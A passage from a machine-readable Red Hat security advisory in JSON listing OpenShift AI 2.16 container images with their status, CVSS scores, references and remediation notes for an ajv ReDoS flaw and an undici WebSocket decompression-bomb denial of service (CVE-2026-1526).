"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1526",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-12T21:01:25.538271+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447142"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in undici. A remote attacker can exploit this vulnerability by sending a specially crafted compressed frame, known as a \"decompression bomb,\" during permessage-deflate decompression. The undici WebSocket client does not properly limit the size of decompressed data, leading to unbounded memory consumption. This can cause the Node.js process to exhaust available memory, resulting in a denial of service (DoS) where the process crashes or becomes unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1526"
},
{
"category": "external",
"summary": "RHBZ#2447142",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447142"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://datatracker.ietf.org/doc/html/rfc7692",
"url": "https://datatracker.ietf.org/doc/html/rfc7692"
},
{
"category": "external",
"summary": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"
},
{
"category": "external",
"summary": "https://hackerone.com/reports/3481206",
"url": "https://hackerone.com/reports/3481206"
}
],
"release_date": "2026-03-12T20:08:05.950000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
